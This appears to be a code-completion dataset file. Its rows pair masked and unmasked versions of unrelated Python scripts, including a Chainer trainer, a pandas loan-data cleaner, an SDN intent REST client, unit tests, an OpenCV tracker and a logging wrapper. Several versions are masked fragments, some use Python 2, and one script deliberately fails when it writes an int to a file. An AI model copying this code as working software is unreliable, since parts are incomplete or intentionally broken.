self.trainer.extend(extensions.PlotReport(['main/loss',
'validation/main/loss'], 'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy',
'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',
'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
<mask token>
| <mask token>
class SoftMaxTrainer:
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=
False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == 'Adam':
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=
out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,
device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss',
'validation/main/loss'], 'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy',
'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',
'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
def predict(self, x):
pred = F.softmax(self.model.predictor(x, train=False))
return pred.data
| import chainer.links as L
import chainer.functions as F
from chainer import optimizer, optimizers, training, iterators
from chainer.training import extensions
from chainer.datasets import tuple_dataset
class SoftMaxTrainer:
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=
False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == 'Adam':
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=
out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,
device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss',
'validation/main/loss'], 'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy',
'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',
'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
def predict(self, x):
pred = F.softmax(self.model.predictor(x, train=False))
return pred.data
| # -*- coding: utf-8 -*-
import chainer.links as L
import chainer.functions as F
from chainer import optimizer, optimizers, training, iterators
from chainer.training import extensions
from chainer.datasets import tuple_dataset
class SoftMaxTrainer():
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == "Adam":
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'],
'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'],
'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss',
'main/accuracy', 'validation/main/accuracy',
'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
def predict(self, x):
pred = F.softmax(self.model.predictor(x, train=False))
return pred.data
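# Typical flow (sketch; `net`, the data arrays and the hyper-parameters are
# assumed, not taken from this module):
# trainer = SoftMaxTrainer(net)
# trainer.set_train_data(train_x, train_t, valid_x, valid_t, n_batch=128)
# trainer.set_trainer('result', gpu=-1, n_epoch=20, g_clip=5.0, opt_name='Adam')
# trainer.start()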
| [
4,
5,
6,
7,
8
] |
1,672 | fc17b865815a7a5ec51f477a9fdda54667686eed | import pandas as pd
import matplotlib.pyplot as plt
loansData = pd.read_csv('loansData.csv')
# Print the first 5 rows of each of the column to see what needs to be cleaned
print loansData['Interest.Rate'][0:5]
print loansData['Loan.Length'][0:5]
print loansData['FICO.Range'][0:5]
# Clean up the columns
loansData['Interest.Rate'] = loansData['Interest.Rate'].map(
lambda x: x.rstrip('%'))
loansData['Loan.Length'] = loansData['Loan.Length'].map(
lambda x: x.rstrip('months'))
# Print again to see if cleaning took place or not
print loansData['Interest.Rate'][0:5]
print loansData['Loan.Length'][0:5]
'''
convert the data in FICO Range into string and
split the string and take the lowest value.
'''
loansData['FICO.Score'] = loansData['FICO.Range'].astype(str)
print loansData['FICO.Score'][0:5]
# note: a pandas Series has no .split(); the per-row split on '-' happens in the loop below
print loansData['FICO.Score'][0:5]
loans_list = loansData['FICO.Score'].tolist()
FICO = []
for array in range(len(loans_list)):
loan = loans_list[array].split("-") # Split each sub-array on '-'
FICO.append(int(loan[0]))
loansData['FICO.Score'] = FICO
# Plot histogram
plt.figure()
p = loansData['FICO.Score'].hist()
plt.show()
# Create a scatterplot matrix
a = pd.scatter_matrix(loansData, alpha=0.05, figsize=(10, 10))
plt.show()
a = pd.scatter_matrix(loansData, alpha=0.05, figsize=(10, 10), diagonal='hist')
plt.show()
| null | null | null | null | [
0
] |
1,673 | 955017ad7cc9dde744b8d8a9439f63f4725d50bc | #!/usr/bin/python
# This script deletes and recreates the NIC BoD intents.
# Use nic-bod-setup.py to set up the physical network and NEMO nodes first
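# invocation sketch: pass --controller <controller-ip> (defaults to 127.0.0.1)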
import requests,json
import argparse, sys
from requests.auth import HTTPBasicAuth
USERNAME='admin'
PASSWORD='admin'
NIC_INTENTS="http://%s:8181/restconf/config/intent:intents"
NIC_INTENT="http://%s:8181/restconf/config/intent:intents/intent/14ce424a-3e50-4a2a-ad5c-b29845158c8b"
def delete_nic_intents(contHost):
delete(NIC_INTENTS % contHost)
def create_nic_intent(contHost):
data = {
"intent": {
"id": "14ce424a-3e50-4a2a-ad5c-b29845158c8b",
"actions": [
{
"order": 1,
"allow": {}
}
],
"subjects": [
{
"order": 1 ,
"end-point-group": { "name": "dmz" }
}, {
"order": 2 ,
"end-point-group": { "name": "interior" }
}
],
"constraints": [
{
"order": 1,
"bandwidth-constraint": { "bandwidth": "10G" }
}
],
"conditions": [
{
"order": 1,
"daily": { "start-time": "08:00:00Z", "duration": "10h" }
}
]
}
}
put(NIC_INTENT % contHost, data)
def post(url, data):
headers = {'Content-type': 'application/yang.data+json',
'Accept': 'application/yang.data+json'}
print "POST %s" % url
print json.dumps(data, indent=4, sort_keys=True)
r = requests.post(url, data=json.dumps(data), headers=headers, auth=HTTPBasicAuth(USERNAME, PASSWORD))
print r.text
r.raise_for_status()
def put(url, data):
headers = {'Content-type': 'application/yang.data+json',
'Accept': 'application/yang.data+json'}
print "PUT %s" % url
print json.dumps(data, indent=4, sort_keys=True)
r = requests.put(url, data=json.dumps(data), headers=headers, auth=HTTPBasicAuth(USERNAME, PASSWORD))
print r.text
r.raise_for_status()
def delete(url):
headers = {'Content-type': 'application/yang.data+json',
'Accept': 'application/yang.data+json'}
print "DELETE %s" % url
r = requests.delete(url, headers=headers, auth=HTTPBasicAuth(USERNAME, PASSWORD))
print r.text
r.raise_for_status()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--controller', default='127.0.0.1', help='controller IP')
args=parser.parse_args()
delete_nic_intents(args.controller)
create_nic_intent(args.controller)
| null | null | null | null | [
0
] |
1,674 | ab632c3c8a7f295a890de19af82fde87c6d600bc | <mask token>
| class Solution(object):
<mask token>
| class Solution(object):
def gcdOfStrings(self, str1, str2):
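        # string analogue of Euclid's algorithm: keep stripping the shorter
        # string off the front of the longer one; equal strings are the gcd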
if str1 == str2:
return str1
elif not str1 or not str2:
return ''
elif str1.startswith(str2):
return self.gcdOfStrings(str1[len(str2):], str2)
elif str2.startswith(str1):
return self.gcdOfStrings(str1, str2[len(str1):])
else:
return ''
| null | null | [
0,
1,
2
] |
1,675 | 71fb9dc9f9ac8b1cdbc6af8a859dbc211512b4d1 | <mask token>
class ImageClassifierMockup(ImageClassifier):
<mask token>
<mask token>
| <mask token>
class ImageClassifierMockup(ImageClassifier):
<mask token>
def classify_image(self, image):
return {'final_class': 'dog', 'final_prob': 0.8}
| <mask token>
class ImageClassifierMockup(ImageClassifier):
def classify_images(self, images):
pass
def classify_image(self, image):
return {'final_class': 'dog', 'final_prob': 0.8}
| from allcode.controllers.image_classifiers.image_classifier import ImageClassifier
class ImageClassifierMockup(ImageClassifier):
def classify_images(self, images):
pass
def classify_image(self, image):
return {'final_class': 'dog', 'final_prob': 0.8}
| from allcode.controllers.image_classifiers.image_classifier import ImageClassifier
class ImageClassifierMockup(ImageClassifier):
def classify_images(self, images):
pass
def classify_image(self, image):
return {'final_class': 'dog',
'final_prob': .8}
| [
1,
2,
3,
4,
5
] |
1,676 | 9cea27abebda10deefa9e05ddefa72c893b1eb18 | import numpy as np
import cv2
from DataTypes import FishPosition
class FishSensor(object):
def __init__(self):
self.cap = cv2.VideoCapture(0)
self.cap.set(3, 280)
self.cap.set(4, 192)
#cv2.namedWindow("image")
#lower_b, lower_g, lower_r = 0, 0, 80
lower_b, lower_g, lower_r = 0, 55, 130
#upper_b, upper_g, upper_r = 130, 75, 115
upper_b, upper_g, upper_r = 100, 145, 195
self.lower = np.array([lower_b, lower_g, lower_r], dtype='uint8')
self.upper = np.array([upper_b, upper_g, upper_r], dtype='uint8')
self.old_x, self.old_y = 0.0, 0.0
self.old_count = 0
def poll(self):
ret, frame = self.cap.read()
mask = cv2.inRange(frame, self.lower, self.upper)
idx_rows, idx_cols = np.where(mask)
        if len(idx_rows) > 0:
row = int(round(idx_rows.mean()))
col = int(round(idx_cols.mean()))
marked_frame = cv2.circle(frame, (col, row), 5, (0, 0, 255), -1)
x = float(col)/(280/2)-1.0
y = float(row)/(192/2)-1.0
self.old_x = x
self.old_y = y
self.old_count = 0
else:
if self.old_count > 5:
x = 0.0
y = 0.0
else:
x = self.old_x
y = self.old_y
self.old_count += 1
#cv2.imshow("image", frame)
#key = cv2.waitKey(1)
return FishPosition(x=x, y=y)
if __name__ == "__main__":
cap = cv2.VideoCapture(0)
cap.set(3, 280)
cap.set(4, 192)
def onClick(event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
print x, y, frame[y, x]
cv2.namedWindow("image")
cv2.setMouseCallback("image", onClick)
#lower_b, lower_g, lower_r = 0, 0, 80
lower_b, lower_g, lower_r = 0, 55, 130
#upper_b, upper_g, upper_r = 130, 75, 115
upper_b, upper_g, upper_r = 100, 145, 195
mode = 0
while True:
ret, frame = cap.read()
lower = np.array([lower_b, lower_g, lower_r], dtype='uint8')
upper = np.array([upper_b, upper_g, upper_r], dtype='uint8')
mask = cv2.inRange(frame, lower, upper)
idx_rows, idx_cols = np.where(mask)
        if len(idx_rows) > 0:
row = int(round(idx_rows.mean()))
col = int(round(idx_cols.mean()))
marked_frame = cv2.circle(frame, (col, row), 5, (0, 0, 255), -1)
print "%.3f, %.3f" % (float(col) / (280.0/2) - 1,
float(row) / (192.0/2) - 1)
#cv2.imshow("image", marked_frame)
else:
pass
#cv2.imshow("image", frame)
if mode:
output = cv2.bitwise_and(frame, frame, mask=mask)
cv2.imshow("image", output)
else:
cv2.imshow("image", frame)
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
if key & 0xFF == ord('w'):
lower_b += 5
if key & 0xFF == ord('s'):
lower_b -= 5
if key & 0xFF == ord('e'):
lower_g += 5
if key & 0xFF == ord('d'):
lower_g -= 5
if key & 0xFF == ord('r'):
lower_r += 5
if key & 0xFF == ord('f'):
lower_r -= 5
if key & 0xFF == ord('t'):
upper_b += 5
if key & 0xFF == ord('g'):
upper_b -= 5
if key & 0xFF == ord('y'):
upper_g += 5
if key & 0xFF == ord('h'):
upper_g -= 5
if key & 0xFF == ord('u'):
upper_r += 5
if key & 0xFF == ord('j'):
upper_r -= 5
if key & 0xFF == ord('m'):
mode = 1 if mode == 0 else 0
if ord('a') <= (key & 0xFF) <= ord('z'):
print (lower_b, lower_g, lower_r), (upper_b, upper_g, upper_r)
cap.release()
cv2.destroyAllWindows()
| null | null | null | null | [
0
] |
1,677 | eda1c1db5371f5171f0e1929e98d09e10fdcef24 | <mask token>
class TestAssert(unittest.TestCase):
<mask token>
<mask token>
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| <mask token>
class TestAssert(unittest.TestCase):
<mask token>
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| <mask token>
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = './test_asserts_db.csv'
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| <mask token>
import unittest
from physalia import asserts
from physalia.fixtures.models import create_random_sample
from physalia.models import Measurement
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = './test_asserts_db.csv'
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| """Test Assert module."""
import unittest
from physalia import asserts
from physalia.fixtures.models import create_random_sample
from physalia.models import Measurement
# pylint: disable=missing-docstring
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = "./test_asserts_db.csv"
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(
9, 1,
app_pkg='com.sample',
use_case='login'
)
sample_high_energy = create_random_sample(
12, 1,
app_pkg='com.sample',
use_case='login'
)
existing_sample_one = create_random_sample(
10, 1,
app_pkg='com.persisted',
use_case='login'
)
existing_sample_two = create_random_sample(
11, 1,
app_pkg='com.persisted',
use_case='logout'
)
for measurement in existing_sample_one+existing_sample_two:
measurement.persist()
asserts.consumption_lower_than_app(
sample_low_energy, "com.persisted"
)
asserts.consumption_lower_than_app(
sample_low_energy, "com.persisted", "login"
)
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(
sample_high_energy, "com.persisted"
)
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(
sample_high_energy, "com.persisted", "login"
)
def test_top_percentile(self):
sample = create_random_sample(
11, 1,
app_pkg='com.sample',
use_case='login'
)
for i in range(100):
existing_sample = create_random_sample(
i, 1,
app_pkg=('com.persisted.{}'.format(i)),
use_case='login'
)
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| [
4,
5,
6,
7,
8
] |
1,678 | e4f07355300003943d2fc09f80746a1201de7e37 | <mask token>
| <mask token>
with open(fn, 'w') as file_Obj:
file_Obj.write(x)
| fn = 'out14_26.txt'
x = 100
with open(fn, 'w') as file_Obj:
file_Obj.write(x)
| # ch14_26.py
fn = 'out14_26.txt'
x = 100
with open(fn, 'w') as file_Obj:
    file_Obj.write(x)         # writing the numeric value x directly raises an error
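# fix: convert the value first, e.g. file_Obj.write(str(x))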
| null | [
0,
1,
2,
3
] |
1,679 | 63001128d9cb934d6f9d57db668a43ba58f4ece3 | <mask token>
class ICrawlerLog:
<mask token>
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
"""
        Choose the log file path and level for the calling module,
        and write log records into that file
"""
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),
key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=
platform_system(), key='log')
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(
self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear()
if not self.logger.handlers:
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' +
'%s %s %s %s %s ' % (group_code, job_code, jobinst_id,
fire_time, address_code) + '%(message)s')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
fh.close()
return self.logger
<mask token>
| <mask token>
class ICrawlerLog:
level_relations = {'debug': logging.DEBUG, 'info': logging.INFO,
'warning': logging.WARNING, 'error': logging.ERROR, 'crit': logging
.CRITICAL}
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
"""
        Choose the log file path and level for the calling module,
        and write log records into that file
"""
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),
key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=
platform_system(), key='log')
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(
self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear()
if not self.logger.handlers:
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' +
'%s %s %s %s %s ' % (group_code, job_code, jobinst_id,
fire_time, address_code) + '%(message)s')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
fh.close()
return self.logger
<mask token>
| <mask token>
class ICrawlerLog:
level_relations = {'debug': logging.DEBUG, 'info': logging.INFO,
'warning': logging.WARNING, 'error': logging.ERROR, 'crit': logging
.CRITICAL}
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
"""
        Choose the log file path and level for the calling module,
        and write log records into that file
"""
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),
key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=
platform_system(), key='log')
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(
self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear()
if not self.logger.handlers:
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' +
'%s %s %s %s %s ' % (group_code, job_code, jobinst_id,
fire_time, address_code) + '%(message)s')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
fh.close()
return self.logger
def log(name):
    def wrapper(func):
def inner(*args, **kwargs):
log = ICrawlerLog(name).save
            log.info('{} started'.format(func))
try:
result = func(*args, **kwargs)
if result:
                    log.info('{} executed successfully'.format(func))
return result
else:
                    log.error('{} returned an empty result'.format(func))
return None
except Exception as e:
                log.error('{} raised an exception and failed; aborting'.format(func))
log.error(e)
return False
return inner
    return wrapper
| from SpiderTools.tool import platform_system
from SpidersLog.file_handler import SafeFileHandler
from Env.parse_yaml import FileConfigParser
from Env import log_variable as lv
from staticparm import root_path
from SpiderTools.tool import get_username
import logging
import logging.handlers
import traceback
class ICrawlerLog:
level_relations = {'debug': logging.DEBUG, 'info': logging.INFO,
'warning': logging.WARNING, 'error': logging.ERROR, 'crit': logging
.CRITICAL}
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
"""
        Choose the log file path and level for the calling module,
        and write log records into that file
"""
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),
key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=
platform_system(), key='log')
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(
self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear()
if not self.logger.handlers:
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' +
'%s %s %s %s %s ' % (group_code, job_code, jobinst_id,
fire_time, address_code) + '%(message)s')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
fh.close()
return self.logger
def log(name):
    def wrapper(func):
def inner(*args, **kwargs):
log = ICrawlerLog(name).save
            log.info('{} started'.format(func))
try:
result = func(*args, **kwargs)
if result:
                    log.info('{} executed successfully'.format(func))
return result
else:
                    log.error('{} returned an empty result'.format(func))
return None
except Exception as e:
                log.error('{} raised an exception and failed; aborting'.format(func))
log.error(e)
return False
return inner
    return wrapper
| # encoding: utf-8
from SpiderTools.tool import platform_system
from SpidersLog.file_handler import SafeFileHandler
from Env.parse_yaml import FileConfigParser
from Env import log_variable as lv
from staticparm import root_path
from SpiderTools.tool import get_username
import logging
import logging.handlers
import traceback
class ICrawlerLog:
level_relations = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'crit': logging.CRITICAL
} # 日志级别关系映射
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
'''
指定保存日志的文件路径,日志级别,以及调用文件
将日志存入到指定的文件中
'''
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
# year = time.strftime('%Y', time.localtime()) # 获取完整年份
# month = time.strftime('%m', time.localtime()) # 获取月
# day = time.strftime('%d', time.localtime()) # 获取日
# 创建一个logger
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
# 创建一个handler,用于写入日志文件
# self.log_time = time.strftime("%Y_%m_%d_")
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=platform_system(), key='log')
# log_path = './Logs/'
# log_path = '/home/ijep/domain/logs/python/'
